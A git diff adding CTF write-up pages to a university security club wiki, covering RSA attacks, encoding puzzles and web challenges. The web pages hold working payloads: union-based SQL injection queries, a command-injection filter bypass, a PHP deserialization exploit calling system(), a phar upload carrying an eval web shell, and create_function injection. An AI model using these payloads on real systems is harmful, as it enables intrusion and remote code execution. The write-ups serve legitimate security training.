diff --git a/404.html b/404.html
index 82c07de..cdebf0a 100755
--- a/404.html
+++ b/404.html
@@ -216,6 +216,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -623,6 +639,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/award/index.html b/award/index.html
index 35babb3..abcd08c 100755
--- a/award/index.html
+++ b/award/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -742,6 +758,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/ctfnotes/CTF-CPYPTO-2/index.html b/ctfnotes/CTF-CPYPTO-2/index.html
new file mode 100755
index 0000000..3bbeee5
--- /dev/null
+++ b/ctfnotes/CTF-CPYPTO-2/index.html
@@ -0,0 +1,1297 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CPYPTO wp-2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+CTF CPYPTO happy
+下载下来附件
+('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL')
+('e=', '0x872a335')
+q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
+qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
+由于0x开头没有L,先把L去掉
+使用gmpy2 编写python脚本
+import gmpy2
+import sympy
+from Crypto.Util.number import *
+c = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e
+
+e = 0x872a335
+
+k1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
+k2 =gmpy2.mpz(k1)
+k2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
+
+p=sympy.Symbol('p')
+q=sympy.Symbol('q')
+solved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])
+print(solved_value)
+p=1158310153629932205401500375817
+q=827089796345539312201480770649
+
+d = gmpy2.invert(e,(p-1)*(q-1))
+m = gmpy2.powmod(c,d,p*q)
+print(long_to_bytes(m))
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-CRYPTO-1/index.html b/ctfnotes/CTF-CRYPTO-1/index.html
new file mode 100755
index 0000000..4797177
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-1/index.html
@@ -0,0 +1,1286 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ez_rsa:
+下载附件:
+
+用编写python代码,因为RSA可逆 :
+p = 1325465431
+
+q = 152317153
+
+e = 65537
+
+n = p*q
+
+L = (p-1)*(q-1)
+
+d = pow(e,-1,L)
+
+print(d)
+
+解出D=43476042047970113
+再经过md5加密得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-CRYPTO-3/index.html b/ctfnotes/CTF-CRYPTO-3/index.html
new file mode 100755
index 0000000..6fb15fc
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-3/index.html
@@ -0,0 +1,1341 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-3 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+RSA共模:
+附件.py:
+from gmpy2 import *
+
+from Crypto.Util.number import *
+
+
+flag = '***************'
+
+p = getPrime(512)
+
+q = getPrime(512)
+
+m1 = bytes_to_long(bytes(flag.encode()))
+
+
+n = p*q
+
+e1 = getPrime(32)
+
+e2 = getPrime(32)
+
+print()
+
+flag1 = pow(m1,e1,n)
+
+flag2 = pow(m1,e2,n)
+
+print('flag1= '+str(flag1))
+
+print('flag2= '+str(flag2))
+
+print('e1= ' +str(e1))
+
+print('e2= '+str(e2))
+
+print('n= '+str(n))
+
+
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+
+e1= 3247473589
+
+e2= 3698409173
+
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
+python脚本
+from gmpy2 import *
+from Crypto.Util.number import *
+
+flag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280
+flag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075
+e1= 3247473589
+e2= 3698409173
+n= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313
+
+def egcd(a, b):
+ if a == 0:
+ return (b, 0, 1)
+ else:
+ g, y, x = egcd(b % a, a)
+ return (g, x - (b // a) * y, y)
+s = egcd(e1,e2)
+s1 = s[1]
+s2 = s[2]
+m = pow(flag1,s1,n)*pow(flag2,s2,n) % n
+# print(m)
+flag = long_to_bytes(m)
+print(flag)
+
+求得NSSCTF{xxxxx* *xxxxx}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-CRYPTO-4/index.html b/ctfnotes/CTF-CRYPTO-4/index.html
new file mode 100755
index 0000000..81e654e
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-4/index.html
@@ -0,0 +1,1323 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-4 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[羊城杯 2021]Bigrsa
+附件提示:共享素数
+from Crypto.Util.number import *
+from gmpy2 import *
+from flag import *
+from Crypto.Util.number import *
+from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+
+# m = bytes_to_long(flag)
+
+# c = pow(m, e, n1)
+
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
+编写脚本
+from Crypto.Util.number import *
+from gmpy2 import *
+# from flag import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+# m = bytes_to_long(flag)
+# c = pow(m, e, n1)
+# c = pow(c, e, n2)
+
+# print("c = %d" % c)
+
+# output
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+
+p=GCD(n1,n2)
+q1=n1//p
+q2=n2//p
+
+phi1=(p-1)*(q1-1)
+phi2=(p-1)*(q2-1)
+
+d1=gmpy2.invert(e,phi1)
+d2=gmpy2.invert(e,phi2)
+c1=pow(c,d2,n2)
+m=pow(c1,d1,n1)
+flag = long_to_bytes(m)
+print(flag)
+
+得flag:
+SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-CRYPTO-5/index.html b/ctfnotes/CTF-CRYPTO-5/index.html
new file mode 100755
index 0000000..5c75e9d
--- /dev/null
+++ b/ctfnotes/CTF-CRYPTO-5/index.html
@@ -0,0 +1,1279 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF CRYPTO wp-5 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹤城杯 2021]A_CRYPTO
+4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
+先rot 13
+得4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
+再base16
+KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
+再base32
+V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
+再base64
+得W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
+最后在https://gchq.github.io/CyberChef/上转base85
+得
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-WEB-2/index.html b/ctfnotes/CTF-WEB-2/index.html
new file mode 100755
index 0000000..bc162f0
--- /dev/null
+++ b/ctfnotes/CTF-WEB-2/index.html
@@ -0,0 +1,1283 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+easy_sql
+title提示参数是wllm
+
+order by查看有几列
+
+得到3列
+改wllm=-1
+?wllm=-1’ union select 1,2,3 --+
+得到2,3
+?wllm=-1' union select 1,2,database()--+
+
+?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
+
+?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+
+
+/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/CTF-Web-1/index.html b/ctfnotes/CTF-Web-1/index.html
new file mode 100755
index 0000000..e7df651
--- /dev/null
+++ b/ctfnotes/CTF-Web-1/index.html
@@ -0,0 +1,1323 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF WEB wp-1
+
+Do_you_konw_http
+
+提示修改user agent 为WLLM
+使用burp抓包 然后send 到 repeater中 在repeater中修改为WLLM
+得到
+
+提示有个a.php
+解除拦截后进入到a.php
+
+要将地址改为本地的回环地址,也就是127.0.0.1
+使用fakeip插件进行修改ip
+
+显示success,并发现secretttt.php
+
+进入到secretttt.php 得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git "a/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html" "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html"
new file mode 100755
index 0000000..746ebe6
--- /dev/null
+++ "b/ctfnotes/RSA\347\256\227\346\263\225\345\216\237\347\220\206/index.html"
@@ -0,0 +1,1490 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ RSA算法原理 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+RSA算法原理
+本文借鉴了https://en.wikipedia.org/wiki/RSA_(cryptosystem) 中的资料和些图片
+一、RSA加密过程:
+(1)RSA基本原则:
+ RSA 背后的一个基本原则是观察到找到三个非常大的正整数 e、d 和 n 是可行的,使得对所有整数 m(0 ≤ m < n)进行模幂运算:
+
+ 三杠表示模同余,也就是当调换e和d的位置,会有相同的余数
+
+RSA 涉及公钥 和私钥 。公钥是众所周知的,用于加密消息。目的是使用公钥加密的消息只能在合理的时间内使用私钥解密。公钥由整数n 和e 表示,私钥由整数d 表示(尽管在解密过程中也会使用n ,因此它也可能被认为是私钥的一部分)。m 代表消息。
+(2)密钥生成:
+RSA算法的密钥以下方式生成:
+1.选择两个相差大的大质数 p 和 q
+ 为了使得因式分解更难,p和q要随机选择:为了选择它们,标准方法是选择随机整数并使用素数测试 ,直到找到两个素数。p和q应保密
+2.计算n
+ n = p*q
+ n作为公钥和私钥的模数。它的长度,通常用比特来表示,就是密钥长度
+3.计算λ ( n )
+在数论这一 数学 分支中,正整数 n 的Carmichael 函数 λ ( n )是满足以下条件的 最小正整数m
+
+ 在代数术语中,λ ( n )是整数乘法群对n取模的指数。
+由于n = pq , λ ( n ) = lcm ( λ ( p ), λ ( q )),并且由于p 和q 是素数,因此λ ( p ) = φ ( p ) = p − 1,同样地λ ( q ) = q − 1。因此λ ( n ) = lcm( p − 1, q − 1)。
+4.选择一个整数e 使得2 < e < λ ( n )和gcd ( e , λ ( n )) = 1;也就是说,e 和λ ( n )互质 。
+ 最常选择的e值是2^16 + 1 =65537
+ e作为公钥的一部分发布
+5.确定d
+ d ≡ e −1 (mod λ ( n ));也就是说,d 是e 模λ ( n )的模乘逆
+
+二、RAS解密过程:
+ 通过计算使得私钥指数从d到c恢复m
+
+示例:
+
+ 但实际使用中国余数定理来加速因子模数的计算(mod pq 使用 mod p 和 mod q)
+中国余数算法:
+
+
+
+
+签名消息
+假设 Alice 希望向 Bob 发送一条签名消息。她可以使用自己的私钥来这样做。她生成消息的散列值 ,将其计算为d 的幂(模n )(就像她在解密消息时所做的那样),并将其作为“签名”附加到消息中。当 Bob 收到签名消息时,他使用相同的哈希算法结合 Alice 的公钥。他对签名求e 次方(模n )(就像他在加密消息时所做的那样),并将生成的散列值与消息的散列值进行比较。如果两者一致,他就知道消息的作者拥有爱丽丝的私钥,并且消息自发送以来没有被篡改过。
+这是运用了求幂规则:
+
+费马小定理
+ 如果p是素数,则对于任意的a,数a^p-a是p的整数倍。
+
+例如 a =2, p =7 则 2^7 = 128,128-2=126=7*18 为7的整数倍
+如果a 不能被p整除,即如果a与p互质,费马小定理等价于(p^-1)-1是p的整数倍
+
+总结:
+在RSA密码应用中,公钥是被公开的,即e和n的数值是可以被得到的。破解RSA密码就是从已知的额和n求得d。这样就可以使用私钥来破解密文了。
+但当p和q是一个很大的素数时,从n去分解因子p和q,是数学界公认的难题。
+因此,在进行RSA加密的时候,应尽量的使用足够大的p和q,来保证d不会被算出
+但是,RSA的缺点也很明显:
+ RSA的安全性完全来自于因子分解,破译RSA的难度等价于分解因子的难度
+ 密钥的产生十分麻烦,受到p和q的影响,很难做到一次一个密钥
+ RSA需要更长的密钥,这就使得运算速度较慢。
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-1096-wp/index.html b/ctfnotes/problem-1096-wp/index.html
new file mode 100755
index 0000000..c363d53
--- /dev/null
+++ b/ctfnotes/problem-1096-wp/index.html
@@ -0,0 +1,1272 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [GXYCTF 2019]Ping Ping Ping - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[GXYCTF 2019]Ping Ping Ping
+沙箱
+$ISF9绕过空格
+exp
+?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php
+然后F12看就能看到了~~才不会说因为这个卡了多久~~
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-1852-wp/index.html b/ctfnotes/problem-1852-wp/index.html
new file mode 100755
index 0000000..96b64f5
--- /dev/null
+++ b/ctfnotes/problem-1852-wp/index.html
@@ -0,0 +1,1367 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]babyserialize - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]babyserialize
+
+审计源码
+构建pop链
+
+NISA.__invoke()
+=>Ilovetxw.__toString()
+ =>four.__set(fun,"sixsixsix")
+ =>Ilovetxw.__call(nisa,"sixsixsix")
+ =>TianXiWei.__wakeup()
+
+
+写exp
+
+<?php
+
+class NISA
+{
+ public $fun = "show_me_fla";
+ public $txw4ever;
+ public function __wakeup()
+ {
+ if ($this->fun == "show_me_flag") {
+ hint();
+ }
+ }
+ function __call($from, $val)
+ {
+ $this->fun = $val[0];
+ }
+
+ public function __toString()
+ {
+ echo $this->fun;
+ return " ";
+ }
+ public function __invoke()
+ {
+ checkcheck($this->txw4ever);
+ @eval($this->txw4ever);
+ }
+}
+
+class TianXiWei
+{
+ public $ext;
+ public $x;
+ public function __wakeup()
+ {
+ $this->ext->nisa($this->x);
+ }
+}
+
+class Ilovetxw
+{
+ public $huang;
+ public $su;
+ public function __call($fun1, $arg)
+ {
+ $this->huang->fun = $arg[0];
+ }
+
+ public function __toString()
+ {
+ $bb = $this->su;
+ return $bb();
+ }
+}
+
+class four
+{
+ public $a = "TXW4EVER";
+ private $fun = 'abc';
+ public function __set($name, $value)
+ {
+ $this->$name = $value;
+ if ($this->fun = "sixsixsix") {
+ strtolower($this->a);
+ }
+ }
+}
+
+$a = new NISA;
+$b = new Ilovetxw;
+$c = new four;
+$d = new Ilovetxw;
+$f = new TianXiWei;
+//
+//$a->txw4ever = 'SYSTEM("ls /");';
+$a->txw4ever = 'SYSTEM("cat /fllllllaaag");';
+$b->su = $a;
+$c->a = $b;
+$d->huang = $c;
+$f->x = "sixsixsix";
+$f->ext = $d;
+
+echo urlencode(serialize($f));
+//
+
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2026-wp/index.html b/ctfnotes/problem-2026-wp/index.html
new file mode 100755
index 0000000..5c603fd
--- /dev/null
+++ b/ctfnotes/problem-2026-wp/index.html
@@ -0,0 +1,1285 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]bingdundun~ - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]bingdundun~
+phar 上传然后phar伪协议访问
+
+//pchar.php
+<?php
+$phar = new Phar('exp.phar'); //
+$phar->buildFromDirectory('./exp');//buildFromDirectory指定压缩的目录
+$phar->compressFiles(Phar::GZ); //Phar::GZ表示使用gzip来压缩此文件
+$phar->stopBuffering();
+$phar->setStub($phar->createDefaultStub('exp.php'));//setSub用来设置启动加载的文件
+?>
+//exp/exp.php
+<?php
+@eval($_POST['shell']);
+?>
+
+最后蚁剑访问 密码shell
+?bingdundun=phar://./upload_name/exp
+flag就在/flag里
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2036-wp/index.html b/ctfnotes/problem-2036-wp/index.html
new file mode 100755
index 0000000..ec24d13
--- /dev/null
+++ b/ctfnotes/problem-2036-wp/index.html
@@ -0,0 +1,1295 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]level-up - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]level-up
+
+level-1
+进入写着nothing here
+F12发现写着disallow
+推测robots.txt
+访问即获得level 2地址
+level-2
+php md5 强碰撞
+post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
+&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
+解决
+得到level 3地址
+level-3
+php sha1 强碰撞
+post
+array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
+&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
+得到level-4地址
+level-4
+php变量解析绕过
+使用GET NI+SA+=txw4ever
+得到level5地址
+level-5
+createfunction绕过
+exp
+?a=\create_function&b=return%200;}var_dump(system("cat%20/flag"));/*
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2049-wp/index.html b/ctfnotes/problem-2049-wp/index.html
new file mode 100755
index 0000000..5f81a44
--- /dev/null
+++ b/ctfnotes/problem-2049-wp/index.html
@@ -0,0 +1,1280 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]huaji? - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]huaji?
+
+binwalk分析
+得到内部有个压缩包
+加密了
+在原图大空白处找到
+两段
+6374665f4e4953415f32303232
+6e6973615f32303232
+hex编码得
+ctf_NISA_2022
+和nisa_2022
+成功解压压缩包得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
